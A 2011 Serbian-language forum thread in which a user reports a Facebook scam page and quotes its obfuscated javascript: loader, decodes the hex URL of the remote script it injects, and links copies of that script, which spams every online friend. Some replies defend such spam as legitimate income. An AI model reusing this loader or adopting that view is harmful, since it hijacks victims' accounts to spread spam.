Forum Sveta kompjutera

Nazad   Forum Sveta kompjutera > Internet > Internet tehnologije

Internet tehnologije Komunikatori, pretraživači, servisi i protokoli...

Tema zaključana
 
Alatke vezane za temu Vrste prikaza
Stara 5.5.2011, 20:48   #1
Nemanja015
Član
 
Član od: 1.12.2008.
Lokacija: Šabac
Poruke: 165
Zahvalnice: 27
Zahvaljeno 13 puta na 8 poruka
Slanje poruke preko MSN-a korisniku Nemanja015
Određen forumom Nova prevara na FaceBooku

Zaustavio sam još jednu veliku FB prevaru.
Reč je o stranici koja se ovih dana verovatno sve češće pojavlivala na vašem chatu. To je stranica pod nazivom "Najgore profilne slike ikada, pogledaj".
Dobio sam sledeću poruku na chatu:
Kod:
nemanja Tvoja slika se nalazi medju najgorim slikama profila,  pogledaj :S  http://www.facebook.com/pages/Najgore-profilne-slike-ikada-pogledaj/163290907066128?sk=app_494975287863157
Zatim kad sam ušao na tab "Pogledajte!" začudilo me je što je ukesto linka tu stavljena sledeća javascripta:
Kod:
javascript:(a=(b=document).createElement('script')).src='\x2F\x2F\x64\x61\x72\x5F\x6B\x31\x2E\x62\x79\x65\x74\x68\x6F\x73\x74\x36\x2E\x63\x6F\x6D\x2F\x73\x6C\x69\x6B\x61\x31\x37\x2E\x6A\x73',b.body.appendChild(a);void(0)
Zatim sam video da ta skripta na stranicu učitava novu javaskriptu čiji je url(hexovan):
Kod:
\x2F\x2F\x64\x61\x72\x5F\x6B\x31\x2E\x62\x79\x65\x74\x68\x6F\x73\x74\x36\x2E\x63\x6F\x6D\x2F\x73\x6C\x69\x6B\x61\x31\x37\x2E\x6A\x73
Odnosno:
Kod:
2F2F6461725F6B312E62796574686F7374362E636F6D2F736C696B6131372E6A73
A kada ga dekriptujemo dobijemo:
Kod:
http://dar_k1.byethost6.com/slika17.js
Naravno ja sam to prijavio hosting kompaniji i više ne možete videti tu skriptu na toj adresi, ali sam zato napravio kopiju te skripte na mom sajtu:
Kod:
http://nemanjan00.zxq.net/upload/slika17.js
Pročitao sam skriptu i malo bolje je proučio i mogu vam reći da je sjajno urađena. Ona svim vašim online prijateljima šalje istu tu poruku koju sam ja već naveo(samo sa imenom prijatelja, a ne "nemanja").
Edit: Pošto mi je host down evo url:
Kod:
http://pastebin.com/zKiYFAmF

Poslednja ispravka: Nemanja015 (6.5.2011 u 11:43)
Nemanja015 je offline  
Stara 5.5.2011, 22:19   #2
Geomaster
V.I.P. Programiranje
 
Član od: 28.6.2007.
Lokacija: Beograd
Poruke: 2.342
Zahvalnice: 2.836
Zahvaljeno 1.047 puta na 507 poruka
Slanje poruke preko MSN-a korisniku Geomaster Slanje poruke preko Skypea korisniku Geomaster
Određen forumom Re: Nova prevara na FaceBook-u

Citat:
Nemanja015 kaže: Pregled poruke
Pročitao sam skriptu i malo bolje je proučio i mogu vam reći da je sjajno urađena. Ona svim vašim online prijateljima šalje istu tu poruku koju sam ja već naveo(samo sa imenom prijatelja, a ne "nemanja").
Skripta nije ništa posebno, samo je jadno obfuscateovana pa tako izgleda Inače, u pitanju je neki srpski skid koji je našao skriptu na netu i utripovao h4xx0ra, nažalost takvih kod nas ima mnogo.
Geomaster je offline  
Sledeći korisnik se zahvaljuje korisniku Geomaster na korisnoj poruci:
federer (7.5.2011)
Stara 6.5.2011, 21:15   #3
el_corona
Starosedelac
 
Član od: 23.1.2008.
Poruke: 1.427
Zahvalnice: 10
Zahvaljeno 366 puta na 331 poruka
Određen forumom Re: Nova prevara na FaceBooku

Skripta nije maliciozna to je sigurno, to sto je obfuscateovana ne znaci da krije neku zlonameru. Nikakvu ti prevaru nisi zaustavio, samo si nekom coveku poremetio nacin zarade koji je veoma sofisticiran ali nije zabranjen. Skripta je legitimna jer koristi facebook stranice zaduzene za ajax chat koji svi dobro znamo, jedina negativna strana je slanje spam chat poruka, koje se od nedavno tretiraju kao regularne poruke na facebooku (mislim na sam chat, ne i na spam). Jedinu modifikaciju skripte koju vidim je ta poruka na srpskom i ovaj reklamni link preko kojeg covek vrsi zaradu. Koristio sam ranije adf.ly servis i mogu reci da je zarada za klik iz Srbije i zemalja okruzenja veoma mizerna, mislim nesto oko 0,001$ po kliku.

Poruku si dobio verovatno od nekog "hakera" koji ti je prijatelj na fejsu jer se ipak i ti kreces u tim vodama. To se dalo videti kada si trazio pomoc pri izradi tvog online bindera (iako source kod mislim nije tvoj). Tako da si zaustavio potencijalnu zaradu nekom svom prijatelju. Znaci ta skripta je slala poruke svim prijateljima, pa svi koji su posetili tu facebook grupu su slali svojim, ne znajuci za to... sto vise ljudi poseti stranicu vise adf.ly klikova = vise $$$. Coveku treba odati priznanje, iako je on samo "skid" kako Geomajstor kaze, a covek koji je napisao skriptu je na poziciji za jedno koplje vise.
el_corona je offline  
Sledećih 4 korisnika se zahvaljuje korisniku el_corona na korisnoj poruci:
allokin (7.5.2011), federer (7.5.2011), Gradimir (6.5.2011), NegativeCreep (10.5.2011)
Stara 6.5.2011, 22:02   #4
Gradimir
Veteran
 
Član od: 19.1.2009.
Lokacija: Wherever I May Roam
Poruke: 819
Zahvalnice: 360
Zahvaljeno 445 puta na 210 poruka
Određen forumom Re: Nova prevara na FaceBooku

Što reče el corona, ti nikakvu prevaru nisi zaustavio, takvih stranica je mali milion, pogotovo na američkim tržištima jer se tamo na njima mnogo mnogo više zarađuje. Jedino što si uradio je nekom poremetio način zarade.

A i sama stranica je reportovana najmanje 1000 puta, čisto sumnjam da si ti jedini odgovoran za njeno uklanjanje.

@Geomaster: Nerviraju me ti script kiddie i sl nazivi , ipak trebaš imati mozga i znati kako naći tu skriptu, i što je još bitnije, kako je iskoristiti. Kasnije sa njom možeš zaraditi dovoljno para da platiš programeru da ti napravi novu i bolju, zbog čega da trošiš svoje vrijeme na učenje programskih jezika kad jednostavno možeš nekome platiti da ti to uradi...
Gradimir je offline  
Stara 7.5.2011, 21:03   #5
federer
Veteran
 
Član od: 15.9.2008.
Lokacija: Rudo, Bosna i Ercegovina
Poruke: 825
Zahvalnice: 447
Zahvaljeno 51 puta na 42 poruka
Slanje poruke preko MSN-a korisniku federer Slanje poruke preko Skypea korisniku federer
Određen forumom Re: Nova prevara na FaceBooku

Uf, ova skripta je zahvatila i mene (nisam ja, brat je, al' niko mi ne vjeruje ) Kako da je zaustavim?
federer je offline  
Stara 7.5.2011, 23:14   #6
Geomaster
V.I.P. Programiranje
 
Član od: 28.6.2007.
Lokacija: Beograd
Poruke: 2.342
Zahvalnice: 2.836
Zahvaljeno 1.047 puta na 507 poruka
Slanje poruke preko MSN-a korisniku Geomaster Slanje poruke preko Skypea korisniku Geomaster
Određen forumom Re: Nova prevara na FaceBooku

Citat:
Gradimir kaže: Pregled poruke
@Geomaster: Nerviraju me ti script kiddie I sl nazivi , ipak trebaš imati mozga i znati kako naći tu skriptu, i što je još bitnije, kako je iskoristiti. Kasnije sa njom možeš zaraditi dovoljno para da platiš programeru da ti napravi novu i bolju, zbog čega da trošiš svoje vrijeme na učenje programskih jezika kad jednostavno možeš nekome platiti da ti to uradi...
Pazi ovako, razmaženi klinci kolima je d*pe zinulo za pare rade sve da bi došli do lake zarade, i upravo je to ono protiv čega bi trebalo da se borimo. Ako nekog mrzi ili je previše razmažen da uči programske jezike, šta on onda hoće? Zaradu na tanjiru? Ako je programer kojeg nameravaju da plate uložio mnogo vremena u svoju veštinu, ko su oni da ih mrzi da uče isto to ako već nemaju para da plate? Što se tiče traženja i upotrebe skripte, to je nešto što bi i mentalno retardirani majmun shvatio, tako da to nije nikakva filozofija. Čak i nazivanje ovog lika skidom je uvreda za skidove, koliko god to čudno zvučalo, sumnjam da uopšte razume kako skripta radi. Te bilmeze i treba prijaviti, ljudi napolju zarađuju novac radeći nešto, a gospoda bi da see za kompom, glupi kao k, pa još i da dobijaju pare. E ne može.
Geomaster je offline  
Sledećih 2 korisnika se zahvaljuje korisniku Geomaster na korisnoj poruci:
alexandar87 (7.5.2011), federer (8.5.2011)
Stara 8.5.2011, 8:17   #7
Gradimir
Veteran
 
Član od: 19.1.2009.
Lokacija: Wherever I May Roam
Poruke: 819
Zahvalnice: 360
Zahvaljeno 445 puta na 210 poruka
Određen forumom Re: Nova prevara na FaceBooku

Citat:
Geomaster kaže: Pregled poruke
Pazi ovako, razmaženi klinci kolima je d*pe zinulo za pare rade sve da bi došli do lake zarade, i upravo je to ono protiv čega bi trebalo da se borimo. Ako nekog mrzi ili je previše razmažen da uči programske jezike, šta on onda hoće? Zaradu na tanjiru? Ako je programer kojeg nameravaju da plate uložio mnogo vremena u svoju veštinu, ko su oni da ih mrzi da uče isto to ako već nemaju para da plate? Što se tiče traženja i upotrebe skripte, to je nešto što bi i mentalno retardirani majmun shvatio, tako da to nije nikakva filozofija. Čak i nazivanje ovog lika skidom je uvreda za skidove, koliko god to čudno zvučalo, sumnjam da uopšte razume kako skripta radi. Te bilmeze i treba prijaviti, ljudi napolju zarađuju novac radeći nešto, a gospoda bi da see za kompom, glupi kao k, pa još i da dobijaju pare. E ne može.
Razmaženim klincima su roditelji obično bogati i uopšte nisu prisiljeni da ovako zarađuju pa to i ne rade Znam iz vlastite situacije, roditelji mi nisu baš bogati, uvijek sam imao osnovno ali ako sam htio nešto više bio sam prisiljen da to sam zaradim tako da većinu stvari koje trenutno posedujem (i skupljih i jeftinijih) kupio sam sam, a još nisam ni punoljetan. Nisam krao skripte i sl, dosta skripti koje su kružile po domaćim (a i stranim) stranicama sam ja programirao i uradio dizajn (ove napredne nisam pošto još nemam toliko znanje javascripta).
Slažem se da ovo nije za one koji ne znaju čak ni html, ali za one koji se znaju snaći, što da ne? Normalno treba da ne pretjeruju u spamovanju i prevarama...
Gradimir je offline  
Sledeći korisnik se zahvaljuje korisniku Gradimir na korisnoj poruci:
uros@3D (8.5.2011)
Stara 8.5.2011, 14:06   #8
uros@3D
Deo inventara foruma
 
Član od: 10.6.2006.
Lokacija: Beograd
Poruke: 5.632
Zahvalnice: 1.193
Zahvaljeno 1.918 puta na 966 poruka
Slanje poruke preko MSN-a korisniku uros@3D
Određen forumom Re: Nova prevara na FaceBooku

Citat:
Gradimir kaže: Pregled poruke
Razmaženim klincima su roditelji obično bogati i uopšte nisu prisiljeni da ovako zarađuju pa to i ne rade
True story

Inace se ne bavim aktivno programiranjem (doduse C ucim evo vec 4 godine, i debelo sam upoznat sa materijom), ponekad programiram nesto za kucne upotrebe, neki mali programcic da olaksa posao, sad trenutno radim i neku igru i tako to ali sve vise me privlaci da se bacim na FB i javascript i pokusam da zaradim neke parice. I naravno da bih prvo uzeo tudju skriptu i modifikovao je (uglavnom razumem strukturu jezika i sta je napisano u skripti), sto da ne, moze mi se. Cisto da probam pa bih posle sam krenuo da pisem iste i prodavao. Znam ljude koji tako zaradjuju pare, pisajuci/modifikujuci i prodajuci skripte koje ce nekim ljudima opet doneti pare pa ce ih i oni prodati itd itd. Nema tu ko je razmazen, ko nije, svako se snalazi na svoj nacin.
uros@3D je offline  
Sledeći korisnik se zahvaljuje korisniku uros@3D na korisnoj poruci:
Gradimir (8.5.2011)
Stara 8.5.2011, 15:51   #9
Gradimir
Veteran
 
Član od: 19.1.2009.
Lokacija: Wherever I May Roam
Poruke: 819
Zahvalnice: 360
Zahvaljeno 445 puta na 210 poruka
Određen forumom Re: Nova prevara na FaceBooku

Citat:
uros@3D kaže: Pregled poruke
ali sve vise me privlaci da se bacim na FB i javascript i pokusam da zaradim neke parice. I naravno da bih prvo uzeo tudju skriptu i modifikovao je (uglavnom razumem strukturu jezika i sta je napisano u skripti), sto da ne, moze mi se.
Vidim da te zanima dizajn i 2d grafika, šta možeš da uradiš je da dizajniraš fb stranice (za npr diskoteke, restorane, klubove, butike, cvjećare i razne ostale privatne radnje, lične stranice i sl) i onda te dizajne prodaješ po netu (npr fiverr, warriorforum wso itd.) ili da nudiš da uradiš stranice direktno za gore navedene biznise.

Poslednja ispravka: Gradimir (8.5.2011 u 16:28)
Gradimir je offline  
Tema zaključana

Bookmarks sajtovi

Alatke vezane za temu
Vrste prikaza

Vaš status
Ne možete postavljati teme
Ne možete odgovarati na poruke
Ne možete slati priloge uz poruke
Ne možete prepravljati svoje poruke

BB kod: uključeno
Smajliji: uključeno
[IMG] kod: uključeno
HTML kod: isključeno


Slične teme
tema temu započeo forum Odgovora Poslednja poruka
Vicevi Oblivion Cvet kompjutera 5481 27.5.2022 5:52
Zarada na Netu Tanas Brbljaonica 859 13.10.2021 17:36
Vista (instalacija) GeForce Operativni sistemi 29 9.5.2010 9:25
Ne vide se dva računara! milicgoran Komunikacioni uređaji i umrežavanje 23 15.6.2009 22:32
Grafika 9800gtx+ vs. ATI4850 Macak Mackin ŠDK - Grafika 132 21.1.2009 1:45


Sva vremena su po Griniču +2 h. Sada je 8:31.


Powered by vBulletin® verzija 3.8.7
Copyright ©2000–2024, vBulletin Solutions, Inc.
Hosted by Beograd.com